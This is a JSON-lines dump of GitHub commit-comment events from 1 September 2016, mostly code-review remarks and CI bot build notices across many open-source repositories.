{"id":"4501326462","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860434,"position":41,"line":41,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T09:01:12Z","updated_at":"2016-09-01T09:01:12Z","body":"`$work_dir` not used?"}},"created_at":"2016-09-01T09:01:12Z"}
{"id":"4501328792","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860437,"position":49,"line":49,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T09:01:39Z","updated_at":"2016-09-01T09:01:39Z","body":"Merge with previous loop?"}},"created_at":"2016-09-01T09:01:39Z"}
{"id":"4501333791","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18860454,"position":null,"line":null,"path":null,"commit_id":"ee6566cae12941062c190e39d65868d7ba9167e4","created_at":"2016-09-01T09:02:42Z","updated_at":"2016-09-01T09:02:42Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aEkIN1rZTjW9oqZqf5SR1w"}},"created_at":"2016-09-01T09:02:42Z"}
{"id":"4501335006","type":"CommitCommentEvent","actor":{"login":"revolter"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":18860457,"position":143,"line":401,"path":"CMakeLists.txt","commit_id":"8a9130883b9e89d57d33b6c3a0ee8ee59ce9957b","created_at":"2016-09-01T09:02:56Z","updated_at":"2016-09-01T09:02:56Z","body":"Yes, we do, saw that @MKleusberg added that comment and thought I should ping you. If this doesn't cause problems, it makes perfect sense."}},"created_at":"2016-09-01T09:02:56Z"}
{"id":"4501336624","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18860465,"position":null,"line":null,"path":null,"commit_id":"cbdf1b1e4d64efe4e8f11c9ebda94ab80cbcaebe","created_at":"2016-09-01T09:03:17Z","updated_at":"2016-09-01T09:03:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#RI0alRXDRkyWopQsRekk_g"}},"created_at":"2016-09-01T09:03:17Z"}
{"id":"4501339645","type":"CommitCommentEvent","actor":{"login":"lucaa"},"repo":{"name":"xwiki-contrib/macro-fullcalendar"},"payload":{"comment":{"id":18860477,"position":20,"line":79,"path":"src/main/resources/Calendar/UpdateService.xml","commit_id":"a77f93f5bac63ee36bfa884f67fc454c30dd3971","created_at":"2016-09-01T09:03:51Z","updated_at":"2016-09-01T09:03:51Z","body":"hmm... shouldn't the test here be made by the presence or not of the endfield in the parameters sent to this service instead of  the presence of the value in the object? Same for the JSONService, when fetching data. \r\nOtherwise put, shouldn't both JSON Service and this service obey the parameters they receive instead of the data they find?"}},"created_at":"2016-09-01T09:03:51Z"}
{"id":"4501340352","type":"CommitCommentEvent","actor":{"login":"Trolx"},"repo":{"name":"Trolx/DataStruct"},"payload":{"comment":{"id":18860478,"position":null,"line":null,"path":null,"commit_id":"ca10212c506ebf7a848984b64d2907427fbbae29","created_at":"2016-09-01T09:03:58Z","updated_at":"2016-09-01T09:03:58Z","body":"Data struct learn "}},"created_at":"2016-09-01T09:03:58Z"}
{"id":"4501355296","type":"CommitCommentEvent","actor":{"login":"lomereiter"},"repo":{"name":"alexandrovteam/pySM"},"payload":{"comment":{"id":18860506,"position":null,"line":null,"path":null,"commit_id":"5863925c510817d063e31efe76df03c68e9f15bb","created_at":"2016-09-01T09:06:59Z","updated_at":"2016-09-01T09:06:59Z","body":"Not necessary here, but in general the correct way is apparently to list dependencies in setup.py `install_requires`, use `pip install -e .` for development and forget about `requirements.txt` altogether.\r\n\r\nhttps://www.reddit.com/r/Python/comments/3uzl2a/setuppy_requirementstxt_or_a_combination/"}},"created_at":"2016-09-01T09:06:59Z"}
{"id":"4501355654","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18860507,"position":null,"line":null,"path":null,"commit_id":"0a08eee5711256319f9b72a4245f92b2f51af590","created_at":"2016-09-01T09:07:04Z","updated_at":"2016-09-01T09:07:04Z","body":"Why"}},"created_at":"2016-09-01T09:07:04Z"}
{"id":"4501358962","type":"CommitCommentEvent","actor":{"login":"BlaXpirit"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":18860514,"position":12,"line":8,"path":"src/pybind/CMakeLists.txt","commit_id":"5683a8259ba6a2e434f8b600d1b5518824a1a394","created_at":"2016-09-01T09:07:41Z","updated_at":"2016-09-01T09:07:41Z","body":"@wjwithagen\r\nSee slightly below, it's used for purposes like `PYTHON${PYTHON_VERSION}_EXECUTABLE` - and there are only `PYTHON_EXECUTABLE` and `PYTHON3_EXECUTABLE` variables, set by finding `PythonInterp 2` and `Python3Interp 3`\r\n\r\n`cython3` means Cython (any version) installed for Python 3.\r\n\r\nLet me know if you find an actual problem caused by this."}},"created_at":"2016-09-01T09:07:41Z"}
{"id":"4501361181","type":"CommitCommentEvent","actor":{"login":"thommy101"},"repo":{"name":"Vazkii/Charset"},"payload":{"comment":{"id":18860518,"position":23,"line":502,"path":"src/main/java/pl/asie/charset/pipes/pipe/PartPipe.java","commit_id":"edb3e18d3caefedc76eb7b2e34fe1af18c9dda6a","created_at":"2016-09-01T09:08:11Z","updated_at":"2016-09-01T09:08:11Z","body":"You've missed my point. If getWorld() is null, the second part of the statement (!getWorld().isRemote) will throw a NPE.\r\nSo eighter the statement is false (getWorld() is not null) or it throws an NPE."}},"created_at":"2016-09-01T09:08:11Z"}
{"id":"4501362413","type":"CommitCommentEvent","actor":{"login":"adbl"},"repo":{"name":"wkh237/react-native-fetch-blob"},"payload":{"comment":{"id":18860521,"position":13,"line":115,"path":"src/ios/RNFetchBlobReqBuilder.m","commit_id":"467788b8c47277b3e378a2c077c7404e2a1a8dc9","created_at":"2016-09-01T09:08:24Z","updated_at":"2016-09-01T09:08:24Z","body":"Wanted to try this out... But if I'm reading this correctly, the only way way for stream/chunked transfer to happen is by setting the `transfer-encoding` header is set to `chunked`, I think you want it to default to use stream/chunked like before? "}},"created_at":"2016-09-01T09:08:24Z"}
{"id":"4501369338","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18860534,"position":null,"line":null,"path":null,"commit_id":"e27cca5f09d1e5e67b645ec00debc6eafed6af25","created_at":"2016-09-01T09:09:50Z","updated_at":"2016-09-01T09:09:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 875](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12123&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T09:09:50Z"}
{"id":"4501374430","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"maksemuz/movies_rb"},"payload":{"comment":{"id":18860546,"position":68,"line":61,"path":"movies.rb","commit_id":"b9f9b6bd3e23178c3a96fde9796ffe1296722b02","created_at":"2016-09-01T09:10:50Z","updated_at":"2016-09-01T09:10:50Z","body":"Некрасивинько :( Лучше сначала reject-ом откинуть нехорошие даты, а потом с помощью group_by сделать сгруппированную статистику."}},"created_at":"2016-09-01T09:10:50Z"}
{"id":"4501375554","type":"CommitCommentEvent","actor":{"login":"ifirmawan"},"repo":{"name":"needDevelopers/simpelhd"},"payload":{"comment":{"id":18860551,"position":null,"line":null,"path":null,"commit_id":"1b6614a73cebf6cd732d97a8fe1dde45ff35d9dd","created_at":"2016-09-01T09:11:06Z","updated_at":"2016-09-01T09:11:06Z","body":"nyobanya sambil nggarap aja mbok bisa?"}},"created_at":"2016-09-01T09:11:06Z"}
{"id":"4501378208","type":"CommitCommentEvent","actor":{"login":"ibaca"},"repo":{"name":"TOMOTON/gwt-dagger2"},"payload":{"comment":{"id":18860562,"position":98,"line":98,"path":"pom.xml","commit_id":"6f49b5396941b12f5931220d14a42bcb0f1c0113","created_at":"2016-09-01T09:11:37Z","updated_at":"2016-09-01T09:11:37Z","body":"In general is a bad idea to execute APT during compilation phase, maven have various phases and if you do not use them correctly, sooner or later some plugins are going to fail. Using the maven-processor-plugin assert that source are generated in the generate-sources phase and most modern IDEs understand this plugin and configure the project accordly.\r\nExample here https://github.com/ibaca/autorest-nominatim-example/blob/master/api/pom.xml#L62"}},"created_at":"2016-09-01T09:11:37Z"}
{"id":"4501378389","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18860563,"position":null,"line":null,"path":null,"commit_id":"3635568d58810bcd9ed0f4b6ad896be652f4c71b","created_at":"2016-09-01T09:11:39Z","updated_at":"2016-09-01T09:11:39Z","body":"Nada"}},"created_at":"2016-09-01T09:11:39Z"}
{"id":"4501380707","type":"CommitCommentEvent","actor":{"login":"DaniilZhavner"},"repo":{"name":"PurrWeb/upwork-user-agreement"},"payload":{"comment":{"id":18860572,"position":null,"line":null,"path":null,"commit_id":"15e8b278f2ccb82aa77c627ee04fa54c335bed55","created_at":"2016-09-01T09:12:09Z","updated_at":"2016-09-01T09:12:09Z","body":"done"}},"created_at":"2016-09-01T09:12:09Z"}
{"id":"4501381963","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860576,"position":53,"line":53,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T09:12:24Z","updated_at":"2016-09-01T09:12:24Z","body":"I would reorder the `if`-statements so that `== 0` comes first, then `> 1`, but that's really just aesthetics."}},"created_at":"2016-09-01T09:12:24Z"}
{"id":"4501382509","type":"CommitCommentEvent","actor":{"login":"bgruening"},"repo":{"name":"bgruening/training-material"},"payload":{"comment":{"id":18860580,"position":null,"line":null,"path":null,"commit_id":"d403cd718a373c9b6255c23b081c70b224c099c5","created_at":"2016-09-01T09:12:31Z","updated_at":"2016-09-01T09:12:31Z","body":"@bebatut it seems to work!"}},"created_at":"2016-09-01T09:12:31Z"}
{"id":"4501392252","type":"CommitCommentEvent","actor":{"login":"andry-tino"},"repo":{"name":"andry-tino/inet"},"payload":{"comment":{"id":18860605,"position":null,"line":null,"path":null,"commit_id":"de0b58e0296fcde910e5a982a611819a1c8cd744","created_at":"2016-09-01T09:14:33Z","updated_at":"2016-09-01T09:14:33Z","body":"Adapting implementation of MU Bundle to TCPSegment as suggested by [OmNeT++ Official docpage](https://omnetpp.org/pmwiki/index.php?n=Main.PointersInMessages)."}},"created_at":"2016-09-01T09:14:33Z"}
{"id":"4501393819","type":"CommitCommentEvent","actor":{"login":"flexfirm"},"repo":{"name":"flexfirm/bmesse-docs"},"payload":{"comment":{"id":18860609,"position":21,"line":279,"path":"Web_SDK導入ガイド.md","commit_id":"bd2190d46e784437fb2bd85650a08c82f467c5ca","created_at":"2016-09-01T09:14:52Z","updated_at":"2016-09-01T09:14:52Z","body":"「専門家」という単語は使っていませんね。「オペレーター」に統一しましょう。"}},"created_at":"2016-09-01T09:14:52Z"}
{"id":"4501395990","type":"CommitCommentEvent","actor":{"login":"bbinet"},"repo":{"name":"mozilla-services/hindsight"},"payload":{"comment":{"id":18860617,"position":8,"line":15,"path":"README.md","commit_id":"f54ae57aec3e4d5f653c59d9b412c92acb4120cb","created_at":"2016-09-01T09:15:19Z","updated_at":"2016-09-01T09:15:19Z","body":"It seems we need to have a mozilla ldap account to be able to register to this mailing list: is it a public mailing list?"}},"created_at":"2016-09-01T09:15:19Z"}
{"id":"4501402052","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18860630,"position":null,"line":null,"path":null,"commit_id":"a7935cac6ebb6388ee7c7df3ac2ebdb8e849ed77","created_at":"2016-09-01T09:16:35Z","updated_at":"2016-09-01T09:16:35Z","body":"lol this is exactly why i dont even play swg now adays to many people get upset . been playing the new battlefield the past few days. Thanks for all the hard work like always marv even if it is not being used. Its good experience for you to get more familiar with the code so kudos "}},"created_at":"2016-09-01T09:16:35Z"}
{"id":"4501404211","type":"CommitCommentEvent","actor":{"login":"ibaca"},"repo":{"name":"TOMOTON/gwt-dagger2"},"payload":{"comment":{"id":18860635,"position":120,"line":120,"path":"pom.xml","commit_id":"6f49b5396941b12f5931220d14a42bcb0f1c0113","created_at":"2016-09-01T09:17:02Z","updated_at":"2016-09-01T09:17:02Z","body":"Most of the configuration in the war and gwt plugins can be omitted if you use the new generation gwt-maven-plugin (tbroyer), the new plugin encourage best practices and simplify configuration. It's strongly recommended, and the old one should really never be used to new projects! In any case, it's a really good example project, I'm just asking for help to promote the use of the new plugin which is much better and solves lot of bad-practices-problems related to the old one. I'll try to make a pull request, but if you want, you can try it your self https://tbroyer.github.io/gwt-maven-plugin/migrating.html. Thanks!"}},"created_at":"2016-09-01T09:17:02Z"}
{"id":"4501407278","type":"CommitCommentEvent","actor":{"login":"DarthPumpkin"},"repo":{"name":"alexandrovteam/pySM"},"payload":{"comment":{"id":18860643,"position":null,"line":null,"path":null,"commit_id":"5863925c510817d063e31efe76df03c68e9f15bb","created_at":"2016-09-01T09:17:40Z","updated_at":"2016-09-01T09:17:40Z","body":"That's how it's done in [pyimzML](https://github.com/alexandrovteam/pyimzML/blob/master/setup.py#L41) but it used to be a pain with numpy/scipy dependencies. The automatic install wouldn't work with pip but apparently this is fixed now so we could consider the `setup.py` approach for all our repos"}},"created_at":"2016-09-01T09:17:40Z"}
{"id":"4501408966","type":"CommitCommentEvent","actor":{"login":"kostyakudo"},"repo":{"name":"kostyakudo/Hillel-FE-Basic"},"payload":{"comment":{"id":18860650,"position":null,"line":null,"path":null,"commit_id":"fc7cddcea70fe091247996647aba1bf0b160f99b","created_at":"2016-09-01T09:18:00Z","updated_at":"2016-09-01T09:18:00Z","body":"Исправил👌🏼\r\n\r\nчетверг, 1 сентября 2016 г. пользователь Kostya Kudo написал:\r\n\r\n> Сейчас сделаю)\r\n>\r\n> четверг, 1 сентября 2016 г. пользователь Denis Zaichenko написал:\r\n>\r\n>> Есть проблемы с форматированием. Код должен выглядеть красиво, везде\r\n>> отступы одинаковые.\r\n>> Например:\r\n>>\r\n>> li:hover{transition: 5s;\r\n>>  font-size: 25px;\r\n>>      margin: 30px;\r\n>>      color:darkgoldenrod;}\r\n>>\r\n>> должно выглядеть так:\r\n>>\r\n>> li:hover {\r\n>>     transition: 5s;\r\n>>     font-size: 25px;\r\n>>     margin: 30px;\r\n>>     color:darkgoldenrod;\r\n>> }\r\n>>\r\n>> —\r\n>> You are receiving this because you authored the thread.\r\n>> Reply to this email directly, view it on GitHub\r\n>> <https://github.com/kostyakudo/Hillel-FE-Basic/commit/fc7cddcea70fe091247996647aba1bf0b160f99b#commitcomment-18860286>,\r\n>> or mute the thread\r\n>> <https://github.com/notifications/unsubscribe-auth/AUWmbaLoObLOP2Pw4ltaLSJtX8ORVgANks5qlpI0gaJpZM4Jyc3L>\r\n>> .\r\n>>\r\n>\r\n"}},"created_at":"2016-09-01T09:18:00Z"}
{"id":"4501409171","type":"CommitCommentEvent","actor":{"login":"polaroi8d"},"repo":{"name":"ARMmbed/jerryscript-1"},"payload":{"comment":{"id":18860651,"position":null,"line":null,"path":null,"commit_id":"da6619977ecc319dd48675fee7a9dc3b985d1671","created_at":"2016-09-01T09:18:04Z","updated_at":"2016-09-01T09:18:04Z","body":"There is an 404 error. When i try to build the jerryscript with mbedos5 in this fork here is the error message that i got `fatal: repository 'https://github.com/matthewelse/jerryscript-lib/' not found` "}},"created_at":"2016-09-01T09:18:04Z"}
{"id":"4501411647","type":"CommitCommentEvent","actor":{"login":"chiukovo"},"repo":{"name":"chiukovo/qcwork"},"payload":{"comment":{"id":18860656,"position":3,"line":3512,"path":"assets/css/style.css","commit_id":"ecb45d418c19ee681912e0ab34fde479146e5f84","created_at":"2016-09-01T09:18:36Z","updated_at":"2016-09-01T09:18:36Z","body":"寫什麼鬼"}},"created_at":"2016-09-01T09:18:36Z"}
{"id":"4501412037","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18860658,"position":null,"line":null,"path":null,"commit_id":"e27cca5f09d1e5e67b645ec00debc6eafed6af25","created_at":"2016-09-01T09:18:40Z","updated_at":"2016-09-01T09:18:40Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 875](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12123&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 212, ignored: 3 Build time: 00:08:50"}},"created_at":"2016-09-01T09:18:40Z"}
{"id":"4501421871","type":"CommitCommentEvent","actor":{"login":"mihirk"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":18860680,"position":null,"line":null,"path":null,"commit_id":"87f1bea9b40b5aafd1a12a990cf415f0b498d1ec","created_at":"2016-09-01T09:20:45Z","updated_at":"2016-09-01T09:20:45Z","body":"This is brilliant Ramki @ramakrishnaippili . The tests are awesome. And this kind of logic definitely requires tests, since its very confusing. "}},"created_at":"2016-09-01T09:20:45Z"}
{"id":"4501422340","type":"CommitCommentEvent","actor":{"login":"BenWindsor"},"repo":{"name":"BenWindsor/isogeometricURSS"},"payload":{"comment":{"id":18860681,"position":null,"line":null,"path":null,"commit_id":"0ffdd405ae665c74e37bc8e1b848fc4d7feccff3","created_at":"2016-09-01T09:20:51Z","updated_at":"2016-09-01T09:20:51Z","body":"Also added the shiftArray.m file which can take an array and permute all the elements back cyclically "}},"created_at":"2016-09-01T09:20:51Z"}
{"id":"4501423505","type":"CommitCommentEvent","actor":{"login":"kpettinga"},"repo":{"name":"ObjectiveSubject/cgu"},"payload":{"comment":{"id":18860688,"position":null,"line":null,"path":null,"commit_id":"abe2b6e84f0c3cbe7ee4042a3acf1436a4cb7a04","created_at":"2016-09-01T09:21:08Z","updated_at":"2016-09-01T09:21:08Z","body":"#63 "}},"created_at":"2016-09-01T09:21:08Z"}
{"id":"4501423726","type":"CommitCommentEvent","actor":{"login":"peta15"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18860691,"position":7,"line":29,"path":"app/components/device.ts","commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T09:21:10Z","updated_at":"2016-09-01T09:21:10Z","body":"we can now make this a computed field (ie get only, not set) on the device model called for instance this.device.typeProperties and eliminate this deviceType() function altogether.  It will also cleanup all the () in app/components/device.html"}},"created_at":"2016-09-01T09:21:10Z"}
{"id":"4501425057","type":"CommitCommentEvent","actor":{"login":"nojhamster"},"repo":{"name":"ezpaarse-project/ezpaarse"},"payload":{"comment":{"id":18860696,"position":5,"line":110,"path":"Makefile","commit_id":"fed23ae1cee903a18641ba0ed57079ee49bb25ae","created_at":"2016-09-01T09:21:27Z","updated_at":"2016-09-01T09:21:27Z","body":"@kerphi j'ai réussi à faire ça en appelant en appelant ce code dans le script \"version\" :\r\n```bash\r\n#!/bin/bash\r\n\r\nset -e\r\necho \"---> Patching docker-compose.yml (prod file) for using this version\"\r\nsed -i \"s#\\(image: inistcnrs/ezmaster:\\)\\([\\.a-z0-9]\\+\\)#\\1${npm_package_version}#g\" docker-compose.yml\r\ngit add docker-compose.yml\r\n```\r\n\r\ndans les scripts \"preversion\" et \"version\", la variable `npm_package_version` contient la nouvelle version :)"}},"created_at":"2016-09-01T09:21:27Z"}
{"id":"4501426112","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18860699,"position":40,"line":119,"path":"static/js/controllers/contacts-content.js","commit_id":"f94c4302cf6e31995aed9c050c979f6ef169d525","created_at":"2016-09-01T09:21:39Z","updated_at":"2016-09-01T09:21:39Z","body":"This and other usages of `getHomePlaceId().then(` breaks for admins because they don't have a homeplace and then `then` will be undefined."}},"created_at":"2016-09-01T09:21:39Z"}
{"id":"4501426864","type":"CommitCommentEvent","actor":{"login":"soyuka"},"repo":{"name":"harttle/pm2-notify"},"payload":{"comment":{"id":18860701,"position":23,"line":114,"path":"index.js","commit_id":"c8811021a8878656f62401363a97a45ae10c9f46","created_at":"2016-09-01T09:21:46Z","updated_at":"2016-09-01T09:21:46Z","body":"Timeout was done on purpose to wait the async call to finish before issuing a new queue call. With an interval you might send to many queues before they finished."}},"created_at":"2016-09-01T09:21:46Z"}
{"id":"4501427430","type":"CommitCommentEvent","actor":{"login":"bongole"},"repo":{"name":"bongole/docker-sync"},"payload":{"comment":{"id":18860702,"position":null,"line":null,"path":null,"commit_id":"f593a1f1ba5b2b450614f0f6caafd510224b83b5","created_at":"2016-09-01T09:21:54Z","updated_at":"2016-09-01T09:21:54Z","body":"@EugenMayer This patch is workaround to work BSD sed regex correctly.\r\nI think BSD sed's regex is complicate and not common. \r\nYou should use docker inspect format to get host port directly without use BSD sed like below.\r\n\r\n```\r\ndocker inspect --format '{{(index (index .NetworkSettings.Ports \"80/tcp\") 0).HostPort}}' 5f2e26ee3df8\r\n```\r\n\r\n* https://docs.docker.com/engine/reference/commandline/inspect/"}},"created_at":"2016-09-01T09:21:54Z"}
{"id":"4501427885","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18860705,"position":52,"line":195,"path":"static/js/controllers/contacts-content.js","commit_id":"f94c4302cf6e31995aed9c050c979f6ef169d525","created_at":"2016-09-01T09:21:59Z","updated_at":"2016-09-01T09:21:59Z","body":"(this is specifically the one that broke for me)"}},"created_at":"2016-09-01T09:21:59Z"}
{"id":"4501428525","type":"CommitCommentEvent","actor":{"login":"alexeyklyukin"},"repo":{"name":"zalando/patroni"},"payload":{"comment":{"id":18860708,"position":49,"line":403,"path":"patroni/ha.py","commit_id":"33ff372ef6b1e56410f008a463329da1b32482be","created_at":"2016-09-01T09:22:08Z","updated_at":"2016-09-01T09:22:08Z","body":"Need a comment here to explain why do we always set it for the nofailover node (I guess nofailover nodes could be 'healthier' than the candidate picked automatically)."}},"created_at":"2016-09-01T09:22:08Z"}
{"id":"4501432862","type":"CommitCommentEvent","actor":{"login":"nojhamster"},"repo":{"name":"ezpaarse-project/ezpaarse"},"payload":{"comment":{"id":18860724,"position":5,"line":110,"path":"Makefile","commit_id":"fed23ae1cee903a18641ba0ed57079ee49bb25ae","created_at":"2016-09-01T09:23:03Z","updated_at":"2016-09-01T09:23:03Z","body":"Il est aussi possible de pusher automatiquement avec un script postversion, cf [la doc](https://docs.npmjs.com/cli/version)"}},"created_at":"2016-09-01T09:23:03Z"}
{"id":"4501435091","type":"CommitCommentEvent","actor":{"login":"pbcastle"},"repo":{"name":"pbcastle/hello-world"},"payload":{"comment":{"id":18860732,"position":null,"line":null,"path":null,"commit_id":"a4e94aedbfcae90f9d417ea275e0aa3dc3066249","created_at":"2016-09-01T09:23:30Z","updated_at":"2016-09-01T09:23:30Z","body":"hi, it's me making a comment"}},"created_at":"2016-09-01T09:23:30Z"}
{"id":"4501437135","type":"CommitCommentEvent","actor":{"login":"soyuka"},"repo":{"name":"harttle/pm2-notify"},"payload":{"comment":{"id":18860738,"position":14,"line":109,"path":"index.js","commit_id":"953d2e24a195f3376629cd069a9b343755bd348e","created_at":"2016-09-01T09:23:55Z","updated_at":"2016-09-01T09:23:55Z","body":"good catch thx!"}},"created_at":"2016-09-01T09:23:55Z"}
{"id":"4501437399","type":"CommitCommentEvent","actor":{"login":"irina-kalina"},"repo":{"name":"irina-kalina/shop_progect"},"payload":{"comment":{"id":18860739,"position":26,"line":26,"path":"action.html","commit_id":"5f1bde6f94f9673c95b49e003aec2eb05b403702","created_at":"2016-09-01T09:23:58Z","updated_at":"2016-09-01T09:23:58Z","body":"qwe"}},"created_at":"2016-09-01T09:23:58Z"}
{"id":"4501442886","type":"CommitCommentEvent","actor":{"login":"jkf37551"},"repo":{"name":"jkf37551/projct"},"payload":{"comment":{"id":18860751,"position":1,"line":1,"path":"README.md","commit_id":"0034765b3814dd7f4cc9f56d19dd47c369e753b9","created_at":"2016-09-01T09:25:06Z","updated_at":"2016-09-01T09:25:06Z","body":"hi my projct workbase!\r\ntest log."}},"created_at":"2016-09-01T09:25:06Z"}
{"id":"4501445860","type":"CommitCommentEvent","actor":{"login":"bgcngm"},"repo":{"name":"hughicy/android_device_xiaomi_gemini"},"payload":{"comment":{"id":18860758,"position":null,"line":null,"path":null,"commit_id":"85a03584f19756044c5ef7d2e1b5a88a50ff1e72","created_at":"2016-09-01T09:25:41Z","updated_at":"2016-09-01T09:25:41Z","body":"Hey, keep authorship please!"}},"created_at":"2016-09-01T09:25:41Z"}
{"id":"4501446849","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18860760,"position":null,"line":null,"path":null,"commit_id":"577cd63755048fac18da12e004618feef12e08b1","created_at":"2016-09-01T09:25:53Z","updated_at":"2016-09-01T09:25:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VHknV1eBQ7ylrlAUZ87XzQ"}},"created_at":"2016-09-01T09:25:53Z"}
{"id":"4501447629","type":"CommitCommentEvent","actor":{"login":"skaldarnar"},"repo":{"name":"Terasology/StructureTemplates"},"payload":{"comment":{"id":18860762,"position":29,"line":29,"path":"src/main/java/org/terasology/structureTemplates/internal/components/LayeredStructureComponent.java","commit_id":"7cf90d7ba99b335b85d41eb91ec42da04384263a","created_at":"2016-09-01T09:26:03Z","updated_at":"2016-09-01T09:26:03Z","body":"I guess a list of layers should work fine, I'll prefer that over just a single list for sake of readability. I went for the map in the first place because (a) the map key would be the actual position on y-axis, and (b) it would technically allow for empty/undefined layers. \r\nHowever, we can probably assume that there are no \"holes\" in the structure, so having a *list of layers*, and the ground *offset* would be enough, the length of the list is the building height, etc. \r\n\r\nP.S.: I know that there should be no short names, I just copied stuff over and hacked together the snippet real quick to get over my intention :wink: "}},"created_at":"2016-09-01T09:26:03Z"}
{"id":"4501450615","type":"CommitCommentEvent","actor":{"login":"caiyuxin"},"repo":{"name":"caiyuxin/caffe"},"payload":{"comment":{"id":18860770,"position":null,"line":null,"path":null,"commit_id":"0c69f8b1a2f92aea4d710153cffe8774468abccf","created_at":"2016-09-01T09:26:41Z","updated_at":"2016-09-01T09:26:41Z","body":"时间、空间两路实现视频分类"}},"created_at":"2016-09-01T09:26:41Z"}
{"id":"4501453544","type":"CommitCommentEvent","actor":{"login":"porky11"},"repo":{"name":"tomhrr/dale"},"payload":{"comment":{"id":18860776,"position":6,"line":1053,"path":"modules/macros-core.dt","commit_id":"ea81f9fed1a5ec850b758a3765a321bebd26c5fe","created_at":"2016-09-01T09:27:17Z","updated_at":"2016-09-01T09:27:17Z","body":"It would also be nice if the namespaces of the definition-side was used (like in cl), but then it may be more difficult to overload functions that can be used by macros"}},"created_at":"2016-09-01T09:27:17Z"}
{"id":"4501453867","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860777,"position":66,"line":66,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T09:27:21Z","updated_at":"2016-09-01T09:27:21Z","body":"Minor: Spacing at end of paren (`} );`)."}},"created_at":"2016-09-01T09:27:21Z"}
{"id":"4501455758","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860779,"position":51,"line":51,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T09:27:45Z","updated_at":"2016-09-01T09:27:45Z","body":"Inconsistent (with other code) paren spacing."}},"created_at":"2016-09-01T09:27:45Z"}
{"id":"4501457436","type":"CommitCommentEvent","actor":{"login":"kusalananda"},"repo":{"name":"NBISweden/wgs-structvar"},"payload":{"comment":{"id":18860787,"position":50,"line":50,"path":"remove_temp_files.pl","commit_id":"68de6812a70d8661fcd937756104f7bdb8ce2088","created_at":"2016-09-01T09:28:06Z","updated_at":"2016-09-01T09:28:06Z","body":"Paren spacing."}},"created_at":"2016-09-01T09:28:06Z"}
{"id":"4501457467","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":18860788,"position":null,"line":null,"path":null,"commit_id":"546ef143e10b26f5bb78dfc0b97508319b3d638c","created_at":"2016-09-01T09:28:06Z","updated_at":"2016-09-01T09:28:06Z","body":"I will Test These Reverts At A Later Time Getting Ready For A Patch To Go On Live."}},"created_at":"2016-09-01T09:28:06Z"}
{"id":"4501459810","type":"CommitCommentEvent","actor":{"login":"alexeyklyukin"},"repo":{"name":"zalando/patroni"},"payload":{"comment":{"id":18860793,"position":69,"line":422,"path":"patroni/ha.py","commit_id":"33ff372ef6b1e56410f008a463329da1b32482be","created_at":"2016-09-01T09:28:34Z","updated_at":"2016-09-01T09:28:34Z","body":"Can be elif self.cluster.failover and self.cluster.failover.candidate == self.state_handler.name:"}},"created_at":"2016-09-01T09:28:34Z"}
